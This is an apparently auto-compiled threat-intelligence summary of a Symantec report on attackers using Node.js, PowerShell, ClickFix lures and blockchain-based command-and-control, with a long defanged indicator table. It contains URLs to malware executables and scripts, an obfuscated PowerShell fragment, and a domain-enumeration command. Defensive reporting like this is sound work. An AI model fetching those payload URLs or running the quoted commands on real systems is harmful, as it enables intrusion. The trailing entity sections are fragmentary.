Attackers Revive Node.js Abuse to Run Malware and Maintain Persistence

Summary
Symantec reports that multiple threat actors have used the legitimate Node.js runtime in attacks since February 2026, including intrusions involving PowerShell, ransomware-linked malware and an implant that contacted Ethereum gateways.
Key points
- Multiple actors have used Node.js in attacks since February 2026 against victims including government departments, technology companies and hotels; some activity is linked to ransomware.
- Attackers abuse the legitimate, signed node.exe runtime to execute malicious scripts, which may evade signature-based detection; registry Run keys can relaunch payloads at login.
- In an Asian technology-company intrusion, ClickFix-style access led to PowerShell activity and a Node.js implant that persisted for months and contacted Ethereum RPC gateways, likely using EtherHiding to retrieve commands or payloads.
- Attackers also targeted a U.S. fintech company using a similar ClickFix and PowerShell chain, deploying the Rust-based C2Looper backdoor. Researchers found no evidence of credential theft, lateral movement or destructive activity in that intrusion.
- Some attacks involved ModeloRAT, associated with initial access broker Woodgnat (also known as KongTuke), which has been linked publicly to intrusions involving multiple ransomware families.
- Earlier Node.js attacks also used tools including AsukaStealer, which can steal credentials, session data and cryptocurrency wallet information, and EtherRAT, which uses blockchain-based command-and-control.
Article Details
- Attack Vectors
- In the two detailed intrusions, commands consistent with ClickFix-style lures were executed on victim hosts. The lure page or message in the U.S. intrusion was not recovered.
- Attackers used PowerShell downloaders and attempted to deploy AdaptixC2 agents and Cobalt Strike Beacon. Several attempted payloads on the Asian technology company's host were blocked.
- At the Asian technology company, attackers installed the official Node.js runtime and used node.exe to execute an implant. A current-user Run key entry was configured to relaunch it at login.
- The Node.js implant contacted Ethereum blockchain RPC gateways, most likely to retrieve C&C configuration or additional payloads from a smart contract. It later contacted a Cloudflare Workers hostname that researchers assessed was likely being abused for C&C.
- In the U.S. fintech intrusion, a PowerShell script appeared to be launched as a service and generated near-daily connections to attacker infrastructure. The attackers later deployed a Rust-based backdoor.
- Defensive Notes
- The article directs readers to the Symantec Protection Bulletin for the latest protection updates.
- The reported intrusions illustrate that a legitimate, signed Node.js runtime can execute malicious scripts and be relaunched through a registry Run key.
- No credential theft, lateral movement, or destructive payload was observed in the U.S. fintech intrusion; the attackers' objectives beyond maintaining a foothold remain unclear.
Indicators of compromise
| Type | Indicator | Context |
|---|---|---|
| DOMAIN | authorized-logins[.]net | Domain listed as a network indicator of compromise. |
| DOMAIN | b6w9m2z5x8q1v3k[.]top | Domain listed as a network indicator of compromise. |
| DOMAIN | bestopebel[.]pl | Domain listed as a network indicator of compromise. |
| DOMAIN | bookphotohot[.]pro | Domain listed as a network indicator of compromise. |
| DOMAIN | bookphotoreserv[.]pro | Domain listed as a network indicator of compromise. |
| DOMAIN | carrolc[.]com | Domain listed as a network indicator of compromise. |
| DOMAIN | challenge-refernow[.]com | Domain listed as a network indicator of compromise. |
| DOMAIN | cj06y9v4xab[.]com | Domain listed as a network indicator of compromise. |
| DOMAIN | csa-humanchecknow[.]com | Domain listed as a network indicator of compromise. |
| DOMAIN | cwrtwright[.]com | Domain listed as a network indicator of compromise. |
| DOMAIN | datalayerservice[.]com | Domain whose subdomains were reportedly configured as Cobalt Strike Beacon C&C. |
| DOMAIN | drivefeedback[.]com | Domain listed as a network indicator of compromise. |
| DOMAIN | grande-luna[.]top | Domain listed as a network indicator of compromise. |
| DOMAIN | helthfulcore[.]info | Domain listed as a network indicator of compromise. |
| DOMAIN | human-check[.]top | Domain listed as a network indicator of compromise. |
| DOMAIN | joincroud[.]info | Domain listed as a network indicator of compromise. |
| DOMAIN | jokesprite[.]info | Domain listed as a network indicator of compromise. |
| DOMAIN | justhandsoff[.]info | Domain listed as a network indicator of compromise. |
| DOMAIN | kedvs4wiykc[.]com | Domain listed as a network indicator of compromise. |
| DOMAIN | kiptownim[.]info | Domain listed as a network indicator of compromise. |
| DOMAIN | klassniylink124[.]com | Domain listed as a network indicator of compromise. |
| DOMAIN | legaar[.]com | Domain listed as a network indicator of compromise. |
| DOMAIN | ministrew[.]info | Domain listed as a network indicator of compromise. |
| DOMAIN | mueleer[.]com | Domain listed as a network indicator of compromise. |
| DOMAIN | ninetyorigins[.]com | Domain listed as a network indicator of compromise. |
| DOMAIN | notstorageapis[.]com | Domain listed as a network indicator of compromise. |
| DOMAIN | oeannon[.]com | Domain listed as a network indicator of compromise. |
| DOMAIN | partner-conflrmpanel[.]com | Domain listed as a network indicator of compromise. |
| DOMAIN | period-checkavaldx[.]com | Domain listed as a network indicator of compromise. |
| DOMAIN | photbookguest[.]pro | Domain listed as a network indicator of compromise. |
| DOMAIN | rebronzeal[.]com | Domain used for recurring PowerShell beaconing. |
| DOMAIN | recepyman[.]info | Domain listed as a network indicator of compromise. |
| DOMAIN | rotoa-upda-lo[.]com | Domain listed as a network indicator of compromise. |
| DOMAIN | rs2y15sungu[.]com | Domain listed as a network indicator of compromise. |
| DOMAIN | safedocphoto[.]info | Domain listed as a network indicator of compromise. |
| DOMAIN | simsracing[.]net | Domain listed as a network indicator of compromise. |
| DOMAIN | sql-updater-service[.]com | Domain listed as a network indicator of compromise. |
| DOMAIN | strapness[.]com | Attacker-used domain from which an obfuscated PowerShell command fetched and ran a script. |
| DOMAIN | summonhood[.]com | Attacker-used domain contacted by the initial PowerShell command. |
| DOMAIN | thomphon[.]com | Domain separately listed as a network indicator of compromise; an installer URL on it is also listed. |
| DOMAIN | toogwido[.]sa[.]com | Domain separately listed as a network indicator of compromise; a PowerShell-script URL on it is also listed. |
| DOMAIN | upd-domain-goloro[.]com | Domain listed as a network indicator of compromise. |
| DOMAIN | updater-worelos[.]com | Domain listed as a network indicator of compromise. |
| DOMAIN | upscale-kolo[.]com | Domain listed as a network indicator of compromise. |
| DOMAIN | visa-safedocs[.]info | Domain listed as a network indicator of compromise. |
| DOMAIN | w3xasv14culvnqj[.]top | Domain listed as a network indicator of compromise. |
| HOSTNAME | api[.]datalayerservice[.]com | Hostname listed as a network indicator of compromise on the reported C&C domain. |
| HOSTNAME | api[.]technodatabase[.]net | Hostname identified as C&C in the network indicators. |
| HOSTNAME | chat[.]devminelimited[.]com | Hostname listed as a network indicator of compromise. |
| HOSTNAME | chat[.]doctecsolutions[.]com | Hostname identified as C&C in the network indicators. |
| HOSTNAME | defs[.]updater-worelos[.]com | Hostname listed as a network indicator of compromise. |
| HOSTNAME | design[.]devminelimited[.]com | Hostname identified as C&C in the network indicators. |
| HOSTNAME | docs[.]datalayerservice[.]com | Hostname listed as a network indicator of compromise on the reported C&C domain. |
| HOSTNAME | formulario[.]puentelargo[.]org | Hostname listed as a network indicator of compromise. |
| HOSTNAME | ftps[.]upd-domain-goloro[.]com | Hostname listed as a network indicator of compromise. |
| HOSTNAME | mail[.]authorized-logins[.]net | Hostname listed as a network indicator of compromise. |
| HOSTNAME | mailes[.]upd-domain-goloro[.]com | Hostname listed as a network indicator of compromise. |
| HOSTNAME | mails[.]updater-worelos[.]com | Hostname listed as a network indicator of compromise. |
| HOSTNAME | microsoft[.]desereyunton[.]workers[.]dev | Specific Cloudflare Workers hostname contacted by the implant and assessed as likely attacker-abused C&C. |
| HOSTNAME | nano[.]upscale-kolo[.]com | Hostname listed as a network indicator of compromise. |
| HOSTNAME | php[.]authorized-logins[.]net | Hostname listed as a network indicator of compromise. |
| HOSTNAME | planner[.]devminelimited[.]com | Hostname identified as C&C in the network indicators. |
| HOSTNAME | resources[.]datalayerservice[.]com | Hostname listed as a network indicator of compromise on the reported C&C domain. |
| HOSTNAME | srv[.]doctecsolutions[.]com | Hostname listed as a network indicator of compromise. |
| HOSTNAME | sss[.]authorized-logins[.]net | Hostname listed as a network indicator of compromise. |
| HOSTNAME | update[.]update-fall[.]com | Hostname listed as a network indicator of compromise. |
| HOSTNAME | video[.]technodatabase[.]net | Hostname identified as C&C in the network indicators. |
| IPV4 | 142[.]93[.]242[.]144 | Address listed as a network indicator of compromise. |
| IPV4 | 144[.]31[.]53[.]78 | Address listed as a network indicator of compromise. |
| IPV4 | 178[.]16[.]55[.]232 | Later backing infrastructure for PowerShell beaconing to rebronzeal[.]com. |
| IPV4 | 185[.]205[.]211[.]217 | Earlier backing infrastructure for PowerShell beaconing to rebronzeal[.]com. |
| IPV4 | 198[.]13[.]159[.]44 | Address listed as a network indicator of compromise. |
| IPV4 | 199[.]91[.]221[.]42 | Address listed as a network indicator of compromise. |
| IPV4 | 45[.]158[.]196[.]23 | C2Looper C&C address; the article specifies port 8888. |
| SHA256 | 08ea6bcce44b13813b321599b1ec88bb2c61314106286eca60402f7e738f3c4d | Listed indicator for agentdiags.exe, identified as an AdaptixC2 agent and suspicious file. |
| SHA256 | 164cad33a0b076a6d01263e159ad06d2e7b1e9e1ace43294c252b11699022485 | Native Node.js addon evasion.node used by the implant. |
| SHA256 | 1a8739e2dedebc971743dd0c985526f2373f871f9c31c5b2258a5e8b373e4df2 | AsukaStealer file indicator. |
| SHA256 | 1d09357b6a096fdc35cd5c873eed15665d6b3c879d20c8cf01e6bca0005512cf | Backdoor.Mistic file indicator. |
| SHA256 | 1e41c7bfaa6aa3b93b6cc024274a10e33f3e12fe7c98c1db387ef8927f9d1984 | Backdoor.Mistic loader file indicator. |
| SHA256 | 1fc515870c681bf3e1b7947e2248bbcfe9918db2978117e91134de20bd42fd6a | Backdoor.Mistic file indicator. |
| SHA256 | 210615866cd2923cc0840f196eb12c00feee113e43850376803c8e024f7e63ce | File listed as suspicious in the indicators section. |
| SHA256 | 232b5115f4b78fe01c6497b1039b85ee57f6a58abd095dc80ea4d3c5e6cef6d6 | File listed as suspicious in the indicators section. |
| SHA256 | 24d71cb6cf6d34871031564c3f104195b812f8e72ceffb1f0ce1936998531e6f | PowerShell script accumulatally.ps1 used in the intrusion. |
| SHA256 | 2cd88d5280a61714836f5f07a16df190911c5b952af2998dbbcda910b3b1c494 | Backdoor.Mistic file indicator. |
| SHA256 | 34d798a6c55e57ed0932b6499f4fbcb5454bdfca903307be101a0594b0ac07bc | Fake lock screen file indicator. |
| SHA256 | 374d7008d9ba33b440d1838561f59d936a25092e4dc60def6346a9486a799906 | Bootstrap download-script file indicator. |
| SHA256 | 3f797a639bc855bc6d5471f327924b62d10900ddec49b970eca6604142bbb4be | Backdoor.Mistic file indicator. |
| SHA256 | 466762502123d91be56d9c5a3b92a55c7e3a8c8939a3006cfaee565440ffe5e4 | Listed indicator for cobol64.exe, identified as an AdaptixC2 agent. |
| SHA256 | 59358233a269ce587a1b24ca35e79ab294ce560b43555b500d02cf03687c4fcf | Cobalt Strike Beacon identified as thread_indirect.exe. |
| SHA256 | 59e3c4cb06331b4f2d78a9a0592f3747e573bd01c5a7650c26361d1e25520712 | Backdoor.Mistic file indicator. |
| SHA256 | 5a27de542f8e4f5f9020baea00ff9e92a5d9a76e3c5143bcfccb55a4ab0be351 | Listed indicator for thread.exe, identified as Cobalt Strike Beacon. |
| SHA256 | 72db2ea09c8d4e09ef99e1342b42491a6aebf6008a1e5337131c8bde06b2ea22 | File listed as suspicious in the indicators section. |
| SHA256 | 7d4fb94f6b4623690daea67ed52e97705cb102f443988ff605f2a9c4898244dc | Backdoor.Mistic file indicator. |
| SHA256 | 7f0754c3c3146efb451ac8e80ef6c3d61395e7974485b94e20ce436341a41240 | Bootstrap download-script file indicator. |
| SHA256 | 8238fa99927aea6a6837792e5c8122ecd9458dd1164a8fd6c86da6794278bcef | AdaptixC2 agent identified as age.exe. |
| SHA256 | 83e970feb3f10692c164f6889f7a026f135c2433e5bf8e662a6e63a3b81267b7 | File listed as suspicious in the indicators section. |
| SHA256 | 8c935feec4bd05d5d918df308be417532fb42608fb989a08eab183e0ae699235 | File listed as suspicious in the indicators section. |
| SHA256 | 9e52cc90cff150abe21f0a6440e86e0a99ff383b81061b96def8948e21d0ac66 | Backdoor.Mistic file indicator. |
| SHA256 | a98dde0e43267e973bd88cb630791cb0b667b8a2e788dc47adf2e85e813eea86 | File listed as suspicious in the indicators section. |
| SHA256 | afd5f1ed45a9867daf3bc64152cef460a06b164c8183e490db39146d4749a82c | Backdoor.Mistic file indicator. |
| SHA256 | b0f918666bb11e8f25956cdfe240bc26b4bd3192f93c123a056fe3df6801a5f5 | File listed as suspicious in the indicators section. |
| SHA256 | b2fe498de7a56646df1a00db3513a6c31eb660fa0405c00cdd2219f26c29ca23 | File listed as suspicious in the indicators section. |
| SHA256 | bdd376d48d5ed482ed48e93ae80579b7c089a3c854225b97cf5f2291ebdb476b | EtherRAT file indicator. |
| SHA256 | c854382d457eddbae9887350f9f19a2bc35c02968900b8f534503d0dcbd824a5 | Rust-based backdoor identified as xhelper64.exe. |
| SHA256 | cd211247d1c1c1ca4d77418fea60efafd0736017ef35c9191aed85c684adc153 | Suspicious file identified as agent_startup.exe. |
| SHA256 | ced6b0f44410f6133ad63b61e04613a8b56cc3338d7b34497540e9541163e7ec | Backdoor.Mistic file indicator. |
| SHA256 | d2705499d24772fa25049f6a58d873a2ff6607d01c64622e85977e7d17d5df41 | Backdoor.Mistic file indicator. |
| SHA256 | d2c60d76e65f547baa13f156470b10f8059082be5603a6e04dd75315043c0a50 | File listed as suspicious in the indicators section. |
| SHA256 | d2c637235d62ad766f961f9b8563f6a0e6db2ec0a343470385991b4df826afbc | Backdoor.Mistic file indicator. |
| SHA256 | d3e64a86909201f930c35b0f1e93e7a2c40a680e951d1fbb78b3047b8cb5c780 | File listed as suspicious in the indicators section. |
| SHA256 | d965de63dbd27abb00efeb9bea029cd38952dc5c268b61a522b2358d8452e43a | Listed indicator for main.x64a.exe; identified as an AdaptixC2 agent. |
| SHA256 | db972979d508e75fe730d3b72c2701470fbdaeaf8ebdd674744754fa44438ca5 | Backdoor.Mistic file indicator. |
| SHA256 | e237801a9ef693d0d4c7d148965bb50c90946b43b8b9e00aa5e39fe5393a26e9 | PowerShell script earthquakeist.ps1 used in the intrusion. |
| SHA256 | e901df53873d5379ad9399c63d3e014c7be188a7599b32e5b36b1de1cf7d5fba | AdaptixC2 agent identified as age64.exe. |
| SHA256 | ebadfe4f370b6129402df7107581c7142c916aa7b0fae588540ab16beb5c4cae | Backdoor.Mistic file indicator. |
| SHA256 | f591275a8f014b29e567529d67c54eb7bb4473db1c38737d6bfd5b3d52c9344e | Backdoor.Mistic file indicator. |
| SHA256 | fb3630822b70bacb56aa4cec29b5a0e3e9acb3920809e70310a4003385a6d34a | Backdoor.Mistic file indicator. |
| URL | hxxp[:]//178[.]16[.]54[.]253/~extranet/phot7482[.]exe | Executable URL listed as a network indicator of compromise. |
| URL | hxxp[:]//178[.]16[.]54[.]253/~extranet/Tmsyz[.]exe | Executable URL listed as a network indicator of compromise. |
| URL | hxxp[:]//193[.]58[.]122[.]42/files/hvnc2[.]exe | Executable URL listed as a network indicator of compromise. |
| URL | hxxp[:]//193[.]58[.]122[.]42/files/rat[.]exe | Executable URL listed as a network indicator of compromise. |
| URL | hxxp[:]//193[.]58[.]122[.]42/files/rat1[.]exe | Executable URL listed as a network indicator of compromise. |
| URL | hxxp[:]//193[.]58[.]122[.]42/files/stil[.]exe | Executable URL listed as a network indicator of compromise. |
| URL | hxxp[:]//193[.]58[.]122[.]42/files/stil1[.]exe | Executable URL listed as a network indicator of compromise. |
| URL | hxxp[:]//199[.]231[.]70[.]175:443/update[.]aspx | Likely staging-server URL contacted during an attempted AdaptixC2 agent download. |
| URL | hxxp[:]//94[.]156[.]114[.]250/files/lasttry[.]exe | Executable URL listed as a network indicator of compromise. |
| URL | hxxp[:]//thomphon[.]com/update[.]msi | Installer URL listed as a network indicator of compromise. |
| URL | hxxps[:]//rebronzeal[.]com | Endpoint contacted repeatedly by the intrusion's PowerShell script. |
| URL | hxxps[:]//summonhood[.]com | Attacker-used endpoint contacted at the start of the U.S. fintech intrusion. |
| URL | hxxps[:]//toogwido[.]sa[.]com/Ca[.]ps1 | PowerShell-script URL listed as a network indicator of compromise. |
| URL | hxxps[:]//www[.]xt24[.]com/install/update[.]ps1 | PowerShell-script URL listed as a network indicator of compromise. |
MITRE ATT&CK
T1059.001 · PowerShellObfuscated PowerShell commands fetched and ran scripts; persistent PowerShell scripts downloaded payloads and generated beaconing traffic.T1059.007 · JavaScriptAttackers used the legitimate node.exe runtime to execute an implant whose malicious logic was carried in interpreted scripts rather than a conventional malicious executable.T1069.002 · Domain GroupsThe attackers ran net.exe group "domain computers" /dom to enumerate members of the domain computers group.T1071.001 · Web ProtocolsThe PowerShell script generated recurring web connections to attacker infrastructure, while the Node.js implant made outbound HTTPS connections during its reported C&C activity.T1105 · Ingress Tool TransferPowerShell downloaded attacker scripts and attempted to download AdaptixC2 agent binaries; attackers also downloaded the official Node.js installer for use in the intrusion.T1547.001 · Registry Run Keys / Startup FolderThe Node.js implant added a value under the current user's registry Run key to relaunch node.exe at each login.
Threat Actors
Malware
8Baselinked to attacks involving multiple ransomware families, including Qilin, Interlock, Rhysida, Akira, 8Base, Black Basta, and Embargo.Akirapublicly linked to attacks involving multiple ransomware families, including Qilin, Interlock, Rhysida, Akira, 8Base, Black Basta, and Embargo.AsukaStealerAsukaStealer: Node.js version of AsukaStealer, which had not been seen before. Malware-as-a-service (MaaS) that can be used to steal credentials, session data, cookies, and cryptocurrency wallet information, as well asBackdoor.MisticNode.js was also used in a recent attack that the Symantec Threat Hunter Team blogged about, in which a new backdoor called Backdoor.Mistic was deployed. This backdoor may also be developed by Woodgnat. Black Bastato attacks involving multiple ransomware families, including Qilin, Interlock, Rhysida, Akira, 8Base, Black Basta, and Embargo.C2LooperThe same attackers also compromised a U.S. fintech company, deploying a Rust-based backdoor known as C2Looper, which has been linked to ransomware attacks.Embargomultiple ransomware families, including Qilin, Interlock, Rhysida, Akira, 8Base, Black Basta, and Embargo.EtherRATEtherRAT: Stealthy Remote Access Trojan (RAT) that is written in Node.js and is largely known for its use of "EtherHiding," a technique that conceals and updates its Command-and-Control (C&C) server addresses by hidingInterlockwhich has been publicly linked to attacks involving multiple ransomware families, including Qilin, Interlock, Rhysida, Akira, 8Base, Black Basta, and Embargo.LooperC2On July 16, attackers deployed a Rust-based backdoor (LooperC2), indicating the victim was likely of interest enough to carry out additional post-compromise activity. However, no evidence of credential theft, lateralModeloRATSome of the attacks involved ModeloRAT, believed to be developed by an initial access broker called Woodgnat (aka KongTuke), which has been publicly linked to attacks involving multiple ransomware families, includingQilinKongTuke), which has been publicly linked to attacks involving multiple ransomware families, including Qilin, Interlock, Rhysida, Akira, 8Base, Black Basta, and Embargo.Rhysidahas been publicly linked to attacks involving multiple ransomware families, including Qilin, Interlock, Rhysida, Akira, 8Base, Black Basta, and Embargo.
Vendors
Cloudflareto the RPC nodes, node.exe was detected communicating with microsoft[.]desereyunton[.]workers[.]dev, a Cloudflare domain for Serverless Workers. Attackers are likely abusing this Cloudflare infrastructure for commandMicrosoftcsidl_profile\appdata\local\microsoft\windowsapps\cache\m4hxy87f\5w3wd\node.exe
Products
EthereumIn one case, attackers installed it from its official site to run an implant commanded via the Ethereum blockchain.Microsoft WindowsCSIDL_SYSTEM\windowspowershell\v1.0\powershell.exe" -wInDOwS MINiMiz $nmu=12;$ZLiP='Name<?,?> -Lis 'Mi*t.Pow*Shell.Ut*ty'));$eupu=$eupu.ExportedCommands;$eupu=$eupu.Values.$ZLiP;$BIew=.$eupu[$nmu]Node.jsNode.js: Old Technique Makes a ComebackPowerShellbetween March and June 2026, the ClickFix technique was used for initial access, with suspicious PowerShell activity then seen on the victim network. Cobalt Strike Beacon and AdaptixC2 activity was also
Tools
AdaptixC2start-up in Asia ran into a problem: almost every payload they attempted to deploy, including AdaptixC2 agents and Cobalt Strike Beacon, was blocked on the victim's network. Their response was to download theCobalt Strike Beaconran into a problem: almost every payload they attempted to deploy, including AdaptixC2 agents and Cobalt Strike Beacon, was blocked on the victim's network. Their response was to download the official Node.jsFake_lock_screenFake_lock_screen: Tool used to mimic a device's operating system interface to trick users into typing their passwords, PINs, or unlock patterns.
Countries
Industries
Educationappeared to be opportunistic and crossed sectors, with Mistic deployed at organizations in insurance, education, IT and professional services.Financial ServicesGovernmenthas observed the technique being used by multiple actors since February 2026. Victims have included government departments, technology companies and hotels.HospitalityInsurancetargeting appeared to be opportunistic and crossed sectors, with Mistic deployed at organizations in insurance, education, IT and professional services.ITin multiple attacks since February 2026, some linked to ransomware. In one case, attackers installed it from its official site to run an implant commanded via the Ethereum blockchain.Professional Servicesand crossed sectors, with Mistic deployed at organizations in insurance, education, IT and professional services.Technologybeing used by multiple actors since February 2026. Victims have included government departments, technology companies and hotels.